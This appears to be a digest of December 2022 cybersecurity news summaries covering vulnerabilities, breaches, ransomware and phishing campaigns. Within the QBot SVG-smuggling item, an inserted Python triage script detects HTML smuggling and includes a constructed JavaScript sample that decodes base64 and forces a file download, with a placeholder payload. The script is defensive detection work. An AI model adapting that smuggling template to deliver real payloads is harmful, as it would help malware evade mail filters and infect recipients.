    Zoho Urges Admins to Patch Critical ManageEngine Bug Immediately

    Zoho is urging customers to patch a critical security flaw impacting multiple ManageEngine products. Tracked as CVE-2022-47523, the flaw is related to a SQL injection vulnerability in the company’s Password Manager Pro secure vault, PAM360 privileged access management software, and Access Manager Plus privileged session management solution. According to Zoho, successful exploitation could enable threat actors to gain unauthenticated access to the backend database and execute queries to retrieve database table entries.
    Below is a list of the impacted product versions:
    Password Manager Pro 12200 and below
    PAM360 5800 and below
    Access Manager Plus 4308 and below

    Database of the Cricketsocial[.]com Platform Left Open Online

    CyberNews discovered that a database used by the platform was left open online, and that it contains a huge trove of data. The social platform for the cricket community exposed over 100k entries of private customer data and credentials. The database, hosted by Amazon Web Services (AWS) in the US, contained admin credentials and private customer data, including email addresses, phone numbers, names, hashed user passwords, dates of birth, and addresses.

    Slack's Private GitHub Code Repositories Stolen over Holidays

    Slack, in a statement this week, alerted users to an incident over the holidays that impacted some of its private GitHub code repositories. The incident involved threat actors gaining access to Slack’s externally hosted GitHub repositories via stolen Slack employee tokens. While some of Slack's private code repositories were breached, Slack’s primary codebase and customer data remained unaffected, according to the company.

    Fortinet Fixed Multiple Command Injection Bugs in FortiADC and FortiTester

    Cybersecurity vendor Fortinet addressed several vulnerabilities impacting its products. The company also warned customers of a high-severity command injection flaw, tracked as CVE-2022-39947 (CVSS score of 8.6), affecting the Application Delivery Controller FortiADC. The CVE-2022-39947 flaw is an improper neutralization of special elements used in an OS command vulnerability in FortiADC; it can potentially lead to arbitrary code execution via specifically crafted HTTP requests.

    Rail Giant Wabtec Discloses Data Breach After Lockbit Ransomware Attack

    U.S. rail and locomotive company Wabtec Corporation has disclosed a data breach that exposed personal and sensitive information. Wabtec is a U.S.-based public company producing state-of-the-art locomotives and rail systems. The company employs approximately 25,000 people and has a presence in 50 countries, being the world's market leader in freight locomotives and a major player in the transit segment. The firm's 2021 financial results give a revenue figure of $7.8 billion, reporting that a staggering 20% of the world's freight is moved by Wabtec's 23,000 locomotives in global operation.

    Synology Fixes Maximum Severity Vulnerability in VPN Routers

    Taiwan-based NAS maker Synology has addressed a maximum (10/10) severity vulnerability affecting routers configured to run as VPN servers. The vulnerability, tracked as CVE-2022-43931, was discovered internally by Synology's Product Security Incident Response Team (PSIRT) in the VPN Plus Server software and was given a maximum CVSS3 Base Score of 10 by the company. VPN Plus Server is a virtual private network server that allows administrators to set up Synology routers as a VPN server to allow remote access to resources behind the router.

    New Shc Linux Malware Used to Deploy CoinMiner

    The ASEC analysis team recently discovered a Linux malware developed with the shell script compiler (shc) that threat actors used to install a CoinMiner. The experts believe attackers initially compromised targeted devices through a dictionary attack on poorly protected Linux SSH servers, then installed multiple pieces of malware on the target system, including the Shc downloader, XMRig CoinMiner, and a Perl-based DDoS IRC Bot.

    Thousands of Citrix Servers Still Unpatched for Critical Vulnerabilities

    According to NCC Group's Fox-IT research team, thousands of Citrix Application Delivery Controller (ADC) and Gateway endpoints remain vulnerable to two critical security flaws disclosed by the company over the last few months. The vulnerabilities in question are being tracked as CVE-2022-27510 and CVE-2022-27518 and have both received a CVSS score of 9.8, indicating a critical level of severity.

    New Linux Malware Uses 30 Plugin Exploits to Backdoor WordPress Sites

    A previously unknown Linux malware has been exploiting 30 vulnerabilities in multiple outdated WordPress plugins and themes to inject malicious JavaScript. According to a report by antivirus vendor Dr. Web, the malware targets both 32-bit and 64-bit Linux systems, giving its operator remote command capabilities. The main functionality of the trojan is to hack WordPress sites using a set of hardcoded exploits that are run successively, until one of them works.

    Atlantic Council: Beyond Attribution: Seeking National Responsibility for Cyber Attacks

    Nations cannot use these levers of power against an individual stone-thrower, but can use them against the nation that abets him. For countries that are willing to cooperate to reduce the numbers of insecure systems, there should be offers of funding, training, education, and access to technology. If a nation repeatedly refuses to cooperate, states on the receiving ends of continuing attacks must have recourse to the traditional full spectrum of coercive policies, from démarches to sanctions in the UN Security Council, prosecution in international courts, and all the way to covert action and kinetic military force.

    Seeking National Responsibility for Cyber Attack

    This paper accordingly introduced the spectrum of state responsibility to shift the discussion away from “attribution fixation,” to national responsibility for attacks in cyberspace. The global national security community needs to shift resources from the technical attribution problem to solving the responsibility problem. This re-establishes state-to-state symmetry and enables a wider range of options open to sovereign nations: diplomatic, intelligence, military, and economic responses.

    Ransomware Gang Apologizes, Gives SickKids Hospital Free Decryptor

    SickKids is a teaching and research hospital in Toronto that provides healthcare to sick children. On December 18th, the hospital suffered a ransomware attack that impacted internal and corporate systems, hospital phone lines, and the website. While the attack only encrypted a few systems, SickKids stated that the incident caused delays in receiving lab and imaging results and resulted in longer patient wait times.

    Ransomware Gang Cloned Victim’s Website to Leak Stolen Data

    On December 26, the threat actor published on their data leak site hidden on the Tor network that they had compromised a company in financial services. As the victim did not meet the threat actor’s demands, BlackCat published all the stolen files as a penalty. As a deviation from the usual process, the hackers decided to also leak the data on a site that mimics the victim's as far as the appearance and the domain name go.

    FBI Recommends Ad Blockers as Cybercriminals Impersonate Brands in Search Engine Ads

    The Federal Bureau of Investigation (FBI) this week raised the alarm on cybercriminals impersonating brands in advertisements that appear in search engine results. The agency has advised consumers to use ad blockers to protect themselves from such threats. The attackers register domains similar to those of legitimate businesses or services and use those domains to purchase ads from search engine advertisement services, the FBI says in an alert. These nefarious ads are displayed at the top of the web page when the user searches for that business or service, and the user might mistake them for an actual search result.

    Vice Society Ransomware Gang Switches to New Custom Encryptor

    The Vice Society ransomware operation has switched to using a custom ransomware encryptor that implements a strong, hybrid encryption scheme based on NTRUEncrypt and ChaCha20-Poly1305. According to cybersecurity firm SentinelOne, which discovered the new strain and named it "PolyVice," it's likely that Vice Society sourced it from a vendor who supplies similar tools to other ransomware groups.

    Comcast Xfinity Accounts Hacked in Widespread 2FA Bypass Attacks

    Comcast Xfinity customers report their accounts being hacked in widespread attacks that bypass two-factor authentication. These compromised accounts are then used to reset passwords for other services, such as the Coinbase and Gemini crypto exchanges. Starting on December 19th, many Xfinity email users began receiving notifications that their account information had been changed. However, when attempting to access the accounts, they could not log in as the passwords had been changed.

    An Iranian Group Hacked Israeli CCTV Cameras, Defense Was Aware but Didn’t Block It

    An Iranian group of hackers, known as Moses Staff, seized control of dozens of Israeli CCTV cameras; the hack was known to the authorities, who did nothing to stop it, reported The Times of Israel, which had access to a preview of the full investigative report. “In a preview of a full investigative report set to be aired on Tuesday, the Kan public broadcaster said officials did not take action to secure the cameras, despite their knowledge of the activities of the group, known as Moses Staff,” The Times of Israel reported.

    Leading Sports Betting Firm BetMGM Discloses Data Breach

    Leading sports betting company BetMGM disclosed a data breach after a threat actor stole personal information belonging to an undisclosed number of customers. While the personal info stolen in the attack varies for each customer, the attackers obtained a wide range of data, including names, contact info (like postal addresses, email addresses, and phone numbers), dates of birth, hashed Social Security numbers, account identifiers (like player IDs and screen names) and info related to transactions with BetMGM. The company added that it discovered the incident in November 2022 but believes the breach occurred in May 2022.

    FIN7 Hackers Create Auto-Attack Platform to Breach Exchange Servers

    The notorious FIN7 hacking group uses an automated attack system that exploits Microsoft Exchange and SQL injection vulnerabilities to breach corporate networks, steal data, and select targets for ransomware attacks based on financial size. This system was discovered by Prodaft's threat intelligence team, which has been closely following FIN7 operations for years now. In a report shared with BleepingComputer before publication, Prodaft reveals details about FIN7's internal hierarchy, affiliations with various ransomware projects, and a new SSH backdoor system used for stealing files from compromised networks.

    Okta Code Repositories Copied

    Yesterday, BleepingComputer claimed to have obtained a 'confidential' security incident notification that Okta has been emailing to its security contacts. Okta has released an official statement which you can find below: “In alignment with our core value of transparency, we are sharing context and details around a recent security event affecting Okta code repositories. There is no impact to any customers, including any HIPAA, FedRAMP or DoD customers. No action is required by customers”

    Zerobot Malware Now Spreads by Exploiting Apache Vulnerabilities

    The Zerobot botnet has been upgraded to infect new devices by exploiting security vulnerabilities affecting Internet-exposed and unpatched Apache servers. The Microsoft Defender for IoT research team also observed that this latest version adds new distributed denial-of-service (DDoS) capabilities. Zerobot has been under active development since at least November, with new versions adding new modules and features to expand the botnet's attack vectors and make it easier to infect new devices, including firewalls, routers, and cameras. Since early December, the malware's developers have removed modules that targeted phpMyAdmin servers, Dasan GPON home routers, and D-Link DSL-2750B wireless routers with year-old exploits.

    Corsair Keyboard Bug Makes It Type on Its Own, No Malware Involved

    Corsair has confirmed that a bug in the firmware of K100 keyboards, and not malware, is behind previously entered text being auto-typed into applications days later. The company's statement comes after multiple K100 users reported that their keyboards were typing text on their own at random moments. A Corsair spokesperson responded to concerns, saying that their keyboards do not have keylogging capabilities, nor do they actively monitor what users type on them. Unfortunately, the latest firmware update made available to K100 devices (version 1.11.39) a couple of weeks back does not fix the issue. To make matters worse, this latest firmware update has caused random freezes on the keyboard, which some users report may be linked to the high polling rate setting.

    Protect Yourself from Social Security Scams

    Scammers are pretending to be government employees. They may threaten you and may demand immediate payment to avoid arrest or other legal action. These criminals continue to evolve and find new ways to steal your money and personal information. Do not fall for it! We want you to know how you and your loved ones can avoid becoming victims!

    Microsoft Shares Details for a Gatekeeper Bypass Bug in Apple MacOS

    Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that threat actors could exploit to bypass the Gatekeeper security feature. Apple's Gatekeeper is designed to protect OS X users by performing several checks before allowing an app to run. The flaw was discovered on July 27, 2022, by Jonathan Bar-Or from Microsoft; it is a logic issue that was addressed with improved checks. “On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple’s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call “Achilles”,” reads the post published by Microsoft.

    Microsoft Pushes Emergency Fix for Windows Server Hyper-V VM Issues

    Microsoft has released an emergency out-of-band (OOB) Windows Server update to address a known issue breaking virtual machine (VM) creation on Hyper-V hosts after installing this month's Patch Tuesday updates. The problem affects only VMs managed with the System Center Virtual Machine Manager (SCVMM) and using Software Defined Networking.

    GodFather Android Banking Trojan Targeting Users of Over 400 Banking and Crypto Apps

    An Android banking trojan known as GodFather is being used to target users of more than 400 banking and cryptocurrency apps spanning across 16 countries. This includes 215 banks, 94 crypto wallet providers, and 110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker News. The malware, like many financial trojans targeting the Android ecosystem, attempts to steal user credentials by generating convincing overlay screens (aka web fakes) that are served atop target applications.

    Organizations Warned of New Attack Vector in Amazon Web Services

    A new security threat to a recently introduced functionality in Amazon Web Services (AWS) has been uncovered by researchers from Mitiga. The attack vector relates to AWS’ Amazon Virtual Private Cloud feature ‘Elastic IP transfer,’ which was announced in October 2022. This feature enables a far easier transfer of Elastic IP addresses from one AWS account to another.

    Raspberry Robin Worm Drops Fake Malware to Confuse Researchers

    This new tactic was discovered by Trend Micro researchers who observed Raspberry Robin in recent attacks against telecommunication service providers and government systems. Raspberry Robin is a worm-like malware dropper that sells initial access to compromised networks to ransomware gangs and malware operators. It has been previously associated with FIN11 and the Clop gang, as well as Bumblebee, IcedID, and TrueBot payload distribution.

    Play ransomware claims attack on German hotel chain H-Hotels

    The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company. H-Hotels is a hospitality business with 60 hotels in 50 locations across Germany, Austria, and Switzerland, offering a total capacity of 9,600 rooms. The hotel chain employs 2,500 people and is one of the largest in the DACH region, operating under 'H-Hotels' and the sub-brands Hyperion, H4 Hotels, H2 Hotels, H + Hotels, H.ostels, and H.omes.

    Microsoft Finds macOS Bug That Lets Malware Bypass Security Checks

    On Monday, Microsoft published details of a recently patched vulnerability (CVE-2022-42821) in macOS, dubbed “Achilles,” that could enable threat actors to bypass application execution restrictions imposed by Apple’s Gatekeeper mechanism. Gatekeeper is a security feature in macOS that automatically checks whether apps downloaded from the Internet are notarized and developer-signed (approved by Apple), asking the user to confirm before launching or issuing an alert that the app cannot be trusted. Similar to the Mark of the Web flags employed in Windows, Gatekeeper checks for an extended attribute called com.apple.quarantine which is assigned by web browsers to all downloaded files.

    Malicious ‘SentinelOne’ PyPI Package Steals Data from Developers

    Threat actors have published a malicious Python package on PyPI, named 'SentinelOne,' that pretends to be the legitimate SDK client for the trusted American cybersecurity firm but, in reality, steals data from developers. Most concerning, the package offers the expected functionality by accessing the SentinelOne API from within another project. This means many developers may not realize they have been compromised. The malicious package has been trojanized to steal sensitive data from compromised developer systems. The packages were discovered by experts at ReversingLabs, who reported the issue and had the malicious PyPI packages removed. The first package was uploaded on December 11, 2022, and had been updated twenty times since then.

    T-Mobile Hacker Gets 10 Years for $25 Million Phone Unlock Scheme

    Argishti Khudaverdyan, the former owner of a T-Mobile retail store, was sentenced to 10 years in prison for a $25 million scheme where he unlocked and unblocked cellphones by hacking into T-Mobile's internal systems. Between August 2014 and June 2019, the 44-year-old man behind the scheme, who was also ordered to pay $28,473,535 in restitution, "cleaned" hundreds of thousands of cellphones for his "customers."

    Microsoft: KB5021233 Causes Blue Screens With 0xc000021a Errors

    Microsoft is investigating a known issue leading to Blue Screen of Death (BSOD) crashes with 0xc000021a errors after installing the Windows 10 KB5021233 cumulative update released during this month's Patch Tuesday. The company warned over the weekend that "after installing KB5021233, some Windows devices might start up to an error (0xc000021a) with a blue screen." According to researchers, this known issue is likely caused by a mismatch between the file versions of hidparse.sys in system32 and system32/drivers in the Windows folder, "which might cause signature validation to fail when cleanup occurs."

    New Agenda Ransomware Variant, Written in Rust, Aiming at Critical Infrastructure

    On Friday, researchers at Trend Micro disclosed details of a new Rust variant of the ransomware strain Agenda, which includes new features allowing for faster encryption and detection evasion. Agenda, also known as Qilin, is a ransomware-as-a-service operation that was first spotted a few months ago, in August 2022, targeting healthcare and education sectors in countries like Thailand and Indonesia. Agenda’s ransomware strains were originally written in the Go programming language. However, in just a short amount of time, the actors have switched to Rust, a cross-platform language that enables the malware to target different operating systems including Windows and Linux.

    Google Takes Gmail Security to the Next Level with Client-Side Encryption

    Google on Friday announced that its client-side encryption for Gmail is in beta for Workspace and education customers as part of its efforts to secure emails sent using the web version of the platform. The development comes at a time when concerns about online privacy and data security are at an all-time high, making it a welcome change for users who value the protection of their personal data. To that end, Google Workspace Enterprise Plus, Education Plus, and Education Standard customers can apply to sign up for the beta until January 20, 2023. It's not available to personal Google Accounts.

    NIST to Scrap SHA-1 Algorithm by 2030

    The US National Institute of Standards and Technology (NIST) has announced the phasing out of the secure hash algorithm (SHA)-1 in the federal government. The agency said it will stop using SHA-1 in its last remaining specified protocols by December 31, 2030. It also recommended that all IT professionals replace the algorithm by the end of the decade, and modules that still use SHA-1 after December 2030 will not be permitted for purchase by the federal government, NIST said in an announcement on December 15.

    Phishing Attack Uses Facebook Posts to Evade Email Security

    A new phishing campaign uses Facebook posts as part of its attack chain to trick users into giving away their account credentials and personally identifiable information (PII). The emails sent to targets pretend to be a copyright infringement issue on one of the recipient's Facebook posts, warning that their account will be deleted within 48 hours if no appeal is filed. The link to appeal the account deletion is an actual Facebook post on facebook.com, helping threat actors bypass email security solutions and ensure their phishing messages land in the target's inbox. The Facebook post pretends to be "Page Support," using a Facebook logo to appear as if the company manages it. However, this post includes a link to an external phishing site named after Meta, Facebook’s owner company, to slightly reduce the chances of victims realizing the scam.

    Veeam Backup and Replication Vulnerabilities Being Exploited in Attacks

    CISA recently added two new vulnerabilities to its catalog of Known Exploited Vulnerabilities (KEV), impacting Veeam Backup and Replication software. The vulnerabilities are being tracked as CVE-2022-26500 and CVE-2022-26501 and have been given a CVSS score of 9.8, indicating a critical level of severity. CVE-2022-26500 is related to an improper limitation of path names in Veeam Backup & Replication, while CVE-2022-26501 is related to improper authentication in Veeam Backup & Replication. Both flaws can be exploited for remote code execution, in turn allowing attackers to compromise and take control of targeted systems.

    IT-ISAC Holiday Ransomware Metrics - November 1st - Today

    I created this report for another information sharing group we work with. At the IT-ISAC we have been tracking ransomware attacks going back to January of 2021. I crunched some numbers from November 1, 2022 - Today. Please find a PDF attached and a CSV of recent events. Our metrics are gathered from industry partners, open source reporting, and manual scans of ransomware leak sites by the IT-ISAC operations team. I will note that they are likely skewed towards the IT sector, which will throw off the statistics.

    Microsoft Fixes Bug That Made Task Manager Partially Unreadable

    Microsoft has addressed a known issue that made parts of the Task Manager unreadable after installing the KB5020044 November preview update on Windows 11 22H2 systems. As Redmond explained when confirming the issue two weeks ago, affected users see some user interface elements of the Task Manager displayed using unexpected colors that make them unreadable.

    FuboTV Says World Cup Streaming Outage Caused by a Cyberattack

    At approximately 2 PM ET, as users were getting ready to watch the World Cup semifinal, FuboTV subscribers could not log in to the streaming service. Instead, they were greeted with a CB_ERR_OPEN error, stating "ff: downstream not available" when logging in. Subscribers could not contact support to report the problem, as it requires a user to first log in to the FuboTV site, which could no longer be done.

    Former Twitter Employee Gets 42 Months for Saudi Scheme

    A former Twitter employee has been handed a jail sentence of over three years after accepting bribes from the Kingdom of Saudi Arabia (KSA) in return for accessing dissidents’ accounts. Ahmad Abouammo, 45, formerly of Walnut Creek, was convicted in August of acting as a foreign agent without notice to the attorney general, conspiracy, wire fraud, international money laundering and falsification of records in a federal investigation.

    FBI Seized Domains Linked to 48 DDoS-for-hire Service Platforms

    The US Department of Justice has seized 48 Internet domains and charged six suspects for their involvement in running ‘Booter’ or ‘Stresser’ platforms that allow anyone to easily conduct distributed denial of service attacks. Booters are online platforms allowing threat actors to pay for distributed denial-of-service attacks on websites and Internet-connected devices. Essentially, they are "booting" the target off of the Internet. Stressers offer the same DDoS features but claim to be provided for legitimate testing of the reliability of web services and the servers behind them.

    Microsoft Reclassifies SPNEGO Extended Negotiation Security Vulnerability as 'Critical’

    Microsoft reclassified the severity of an information disclosure vulnerability in SPNEGO NEGOEX that it patched in September 2022, after discovering the flaw could enable attackers to remotely execute code. “SPNEGO, short for Simple and Protected GSSAPI Negotiation Mechanism (SPNEGO), is a scheme that allows a client and remote server to arrive at a consensus on the choice of the protocol to be used (e.g., Kerberos or NTLM) for authentication”.

    Hackers Using SVG Files to Smuggle QBot Malware onto Windows Systems

    Phishing campaigns involving the Qakbot malware are using Scalable Vector Graphics (SVG) images embedded in HTML email attachments. The new distribution method was spotted by Cisco Talos, which said it identified fraudulent email messages featuring HTML attachments with encoded SVG images that incorporate HTML script tags. HTML smuggling is a technique that relies on using legitimate features of HTML and JavaScript to run encoded malicious code contained within the lure attachment and assemble the payload on a victim's machine as opposed to making an HTTP request to fetch the malware from a remote server. In other words, the idea is to evade email gateways by storing a binary in the form of a JavaScript code that's decoded and downloaded when opened via a web browser.
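
    As an added illustration of the triage a mail gateway or analyst could apply to such attachments (example code, not from Cisco Talos or the original article), the script below parses an HTML attachment, collects script elements nested inside inline or base64-encoded SVG, and flags the client-side payload-assembly APIs the paragraph describes. The two sample attachments are constructed, and the "payload" is a harmless placeholder string.

```python
"""Triage helper for HTML e-mail attachments that embed an SVG with script
content, the HTML-smuggling pattern described above.  Added example, not code
from Cisco Talos or the original article; the sample attachments are constructed."""
import base64
import re
from html.parser import HTMLParser

# Browser APIs typically used to assemble a binary client-side and drop it to disk.
SMUGGLING_APIS = ("atob(", "new Blob(", "createObjectURL", "msSaveOrOpenBlob", ".download")
# A long unbroken base64 run inside script text hints at an embedded binary; SVG shipped
# as a base64 data: URI (in an attribute or a JS string) is decoded and scanned as well.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
DATA_SVG_B64 = re.compile(r"data:image/svg\+xml;base64,([A-Za-z0-9+/=]+)")


class SvgScriptFinder(HTMLParser):
    """Collects the bodies of <script> elements nested inside <svg> elements."""

    def __init__(self):
        super().__init__()
        self.svg_depth = 0
        self.in_script = False
        self.svg_scripts = []
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        elif tag == "script" and self.svg_depth > 0:
            self.in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth > 0:
            self.svg_depth -= 1
        elif tag == "script" and self.in_script:
            self.in_script = False
            self.svg_scripts.append("".join(self._buf))

    def handle_data(self, data):
        if self.in_script:
            self._buf.append(data)


def extract_svg_scripts(html: str) -> list:
    """Script bodies from inline SVG plus any found in base64-encoded SVG data: URIs."""
    finder = SvgScriptFinder()
    finder.feed(html)
    finder.close()
    scripts = list(finder.svg_scripts)
    for match in DATA_SVG_B64.finditer(html):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError; skip malformed blobs
            continue
        inner = SvgScriptFinder()
        inner.feed(decoded)
        inner.close()
        scripts.extend(inner.svg_scripts)
    return scripts


def triage_attachment(html: str) -> dict:
    """Any script inside SVG is notable; base64 blobs and Blob/atob/download APIs mean assembly."""
    scripts = extract_svg_scripts(html)
    indicators = set()
    for body in scripts:
        indicators.add("script element inside svg")
        if BASE64_RUN.search(body):
            indicators.add("long base64 run inside svg script")
        for api in SMUGGLING_APIS:
            if api in body:
                indicators.add("smuggling api: " + api)
    # A scripted SVG alone is worth a look; payload-assembly APIs on top of it justify blocking.
    if any(i.startswith("smuggling api") for i in indicators):
        verdict = "block"
    elif indicators:
        verdict = "review"
    else:
        verdict = "clean"
    return {"svg_scripts": len(scripts), "indicators": sorted(indicators), "verdict": verdict}


# Constructed samples: a benign inline SVG, and a smuggling-style attachment whose
# "payload" is a harmless placeholder string (NOT real malware).
BENIGN_HTML = """<html><body><p>Quarterly chart</p><svg xmlns="http://www.w3.org/2000/svg"
width="40" height="40"><circle cx="20" cy="20" r="15"/></svg></body></html>"""

PLACEHOLDER_B64 = base64.b64encode(b"CONSTRUCTED PLACEHOLDER, NOT A PAYLOAD. " * 6).decode()
SMUGGLING_HTML = """<html><body><p>Your invoice is attached.</p>
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<script type="text/javascript">
  var data = atob("__B64__");
  var bytes = Uint8Array.from(data, function (c) { return c.charCodeAt(0); });
  var blob = new Blob([bytes], {type: "application/zip"});
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob); a.download = "invoice.zip"; a.click();
</script>
</svg></body></html>""".replace("__B64__", PLACEHOLDER_B64)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_HTML), ("smuggling", SMUGGLING_HTML)):
        print(name, triage_attachment(sample))
```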

    Hackers Target Japanese Politicians With New Mirrorstealer Malware

    The MirrorFace hacking group (APT10 and Cicada) began sending spear-phishing emails to their targets on June 29, 2022, pretending to be PR agents from the recipient’s political party, asking them to post the attached video files on social media. The threat actors impersonated a Japanese ministry, attaching decoy documents that extract WinRAR archives in the background. The library contained an encrypted copy of the LODEINFO malware, a malicious DLL loader, and an innocuous application (K7Security Suite) used for DLL search order hijacking.

    Apple Fixed the Tenth Actively Exploited Zero-Day This Year

    Apple released security updates to address a new zero-day vulnerability, tracked as CVE-2022-42856, that is actively exploited in attacks against iPhones. The flaw is the tenth actively exploited zero-day vulnerability since the start of the year. The IT giant released security bulletins for iOS/iPadOS 15.7.2, Safari 16.2, tvOS 16.2, and macOS Ventura 13.1.

    Microsoft-Signed Malicious Windows Drivers Used in Ransomware Attacks

    In reports released today, researchers explain how they found a new toolkit consisting of two components named STONESTOP (loader) and POORTRY (kernel-mode driver) being used in "bring your own vulnerable driver" (BYOVD) attacks. According to Mandiant and SentinelOne, STONESTOP is a user-mode application that attempts to terminate endpoint security software processes on a device. Another variant includes the ability to overwrite and delete files.

    Lockbit Claims Attack on California’s Department of Finance

    On Monday, the LockBit ransomware gang claimed on its data leak site to have breached the Department of Finance in California. As proof of their claim, the threat actors published a few screenshots of the files allegedly stolen from the government agency. In total, 246,000 files in more than 114,000 folders amounting to 76 GB of data were allegedly exfiltrated, including databases, confidential data, financial documents, certifications, and IT documents. The ransomware actors have placed a counter on their post, stating that they will publish all of the stolen files if a ransom is not paid by December 24.

    Microsoft December 2022 Patch Tuesday Fixes 2 Zero-Days, 49 Flaws

    As part of the December 2022 Patch Tuesday, Microsoft addressed 49 flaws, including two zero-days, one of which is being actively exploited in attacks. Of the 49 flaws fixed, there were 17 elevation of privilege vulnerabilities, 2 security feature bypass vulnerabilities, 23 remote code execution vulnerabilities, 3 denial of service vulnerabilities, and 1 spoofing vulnerability. Six of the vulnerabilities have been rated critical in severity and relate to remote code execution.

    Uber Suffers New Data Breach After Attack on Vendor, Info Leaked Online

    Uber has suffered a new data breach after a threat actor leaked employee email addresses, corporate reports, and IT asset information stolen from a third-party vendor in a cybersecurity incident. Early Saturday morning, a threat actor named 'UberLeaks' began leaking data they claimed was stolen from Uber and Uber Eats on a hacking forum known for publishing data breaches. The leaked data includes numerous archives claiming to be source code associated with mobile device management platforms (MDM) used by Uber and Uber Eats and third-party vendor services.

    Fortinet Says SSL-VPN Pre-Auth RCE Bug Is Exploited in Attacks

    On Monday, Fortinet released an advisory to warn users about a vulnerability in its FortiOS SSL-VPN that is actively being exploited in attacks. Tracked as CVE-2022-42475, the flaw is a heap-based buffer overflow bug which could allow an unauthenticated attacker to execute arbitrary code or commands via specially crafted requests on vulnerable devices. CVE-2022-42475 was discovered and disclosed to Fortinet by French cybersecurity firm Olympe Cyberdefense. Shortly after the disclosure, Fortinet began rolling out new FortiOS versions to address the flaw.

    Amazon ECR Public Gallery Flaw Could Have Wiped or Poisoned Any Image

    Amazon ECR Public Gallery is a public repository of container images used for sharing ready-to-use applications and popular Linux distributions, such as Nginx, EKS Distro, Amazon Linux, CloudWatch agent, and Datadog agent. A Lightspin security analyst discovered a new flaw in the ECR Public Gallery where it's possible to modify existing public images, layers, tags, registries, and repositories of other users by abusing undocumented API actions.

    Experts Warn ChatGPT Could Democratize Cybercrime

    A wildly popular new AI bot could be used by would-be cyber-criminals to teach them how to craft attacks and even write ransomware, security experts have warned. ChatGPT was released by artificial intelligence R&D firm OpenAI last month and has already passed one million users. The prototype chatbot answers questions with apparent authority in natural language, by trawling vast volumes of data across the internet. It can even be creative, for example by writing poetry.

    State-Sponsored Attackers Actively Exploiting RCE in Citrix Devices, Patch ASAP!

    An unauthenticated remote code execution flaw (CVE-2022-27518) is being leveraged by a Chinese state-sponsored group to compromise Citrix Application Delivery Controller (ADC) deployments, the US National Security Agency has warned. “Targeting Citrix ADCs can facilitate illegitimate access to targeted organizations by bypassing normal authentication controls.” CVE-2022-27518 stems from the vulnerable devices’ software failing to maintain control over a resource throughout its lifetime (creation, use, and release) and gives remote attackers the opportunity to execute arbitrary code (without prior authentication) on vulnerable appliances.

    Claroty - Abusing JSON-Based SQL to Bypass WAF

    Claroty's Team82 has developed a technique to bypass industry-leading web application firewalls (WAF) by appending JSON syntax to SQL injection payloads. WAFs are designed to protect web-based applications and APIs from malicious traffic, but this technique works because major WAF vendors lack support for JSON syntax, despite it being supported by most database engines for a decade. This means that appending JSON to SQL syntax can leave the WAF blind to attacks. The technique was tested against WAFs from Palo Alto Networks, Amazon Web Services, Cloudflare, F5, and Imperva, and all five have been notified and have updated their products to support JSON syntax.

    Hackers Earn $989,750 for 63 Zero-Days Exploited at pwn2own Toronto

    Pwn2Own Toronto 2022 has ended with competitors earning $989,750 for 63 zero-day exploits (and multiple bug collisions) targeting consumer products between December 6th and December 9th. During this hacking competition, 26 teams and security researchers targeted devices in the mobile phone, home automation hub, printer, wireless router, network-attached storage, and smart speaker categories, all up-to-date and in their default configuration.

    Clop Ransomware Uses TrueBot Malware for Access to Networks

    Security researchers have noticed a spike in devices infected with the TrueBot malware downloader created by a Russian-speaking hacking group known as Silence. The Silence group is known for its big heists against financial institutions, and has begun to shift from phishing as an initial compromise vector. The threat actor is also using a new custom data exfiltration tool called Teleport. Analysis of Silence's attacks over the past months revealed that the gang delivered Clop ransomware typically deployed by TA505 hackers, which are associated with the FIN11 group.

    Holiday Scams

    We've received an alarming amount of news and inquiries where individuals, including family members, are receiving a ton of email-related phishing scams. The messages increased in November and will likely continue into January. One report included a fraudulent FedEx template where an elderly family member unknowingly entered their financial information into the supplied message fields; their debit card information was stolen and used by the adversary. In another reported phishing attempt, a McAfee template with a sense of urgency was sent to an elderly individual with the subject line, "Your devices are under attack; please Upgrade Now for Protection." The targeted individual looked up McAfee's support number and contacted the company, which informed them it was a scam and that no action was needed.

    Cisco discloses high-severity IP phone bug with exploit code

    On Thursday, Cisco disclosed a vulnerability in its IP Phones (running 7800 and 8800 Series firmware) which can be exploited for remote code execution and denial of service attacks. Tracked as CVE-2022-20968, the vulnerability is due to insufficient input validation of received Cisco Discovery Protocol packets, which enables an unauthenticated attacker to cause a stack overflow on the affected device.

    Software Supply Chain Attacks Leveraging Open-Source Repos Growing

    Researchers from ReversingLabs released their report, The State of Software Supply Chain Security, published on December 5, 2022. The report examines an exponential increase in supply chain attacks between 2020 and early 2022. ReversingLabs based their research on the number of malicious packages uploaded to open-source repositories such as npm, PyPI and RubyGems.

    Hacked Corporate Email Accounts Used to Send MSP Remote Access Tool

    MuddyWater hackers, a group associated with Iran’s Ministry of Intelligence and Security (MOIS), used compromised corporate email accounts to deliver phishing messages to their targets. The group adopted the new tactic in a campaign that might have started in September but wasn’t observed until October, and combined it with the use of a legitimate remote administration tool. MuddyWater has used legitimate remote administration tools for its hacking activities in the past. Researchers discovered campaigns from this group in 2020 and 2021 that relied on RemoteUtilities and ScreenConnect.

    Hackers use new Fantasy data wiper in coordinated supply chain attack

    The Iranian Agrius APT hacking group is using a new 'Fantasy' data wiper in supply-chain attacks impacting organizations in Israel, Hong Kong, and South Africa. The campaign started in February and unfolded at full scale in March 2022, breaching an IT support services firm, a diamond wholesaler, a jeweler, and an HR consulting company. In this campaign, Agrius used a new wiper named 'Fantasy' hidden inside a software suite created by an Israeli vendor. This software is commonly used in the diamond industry.

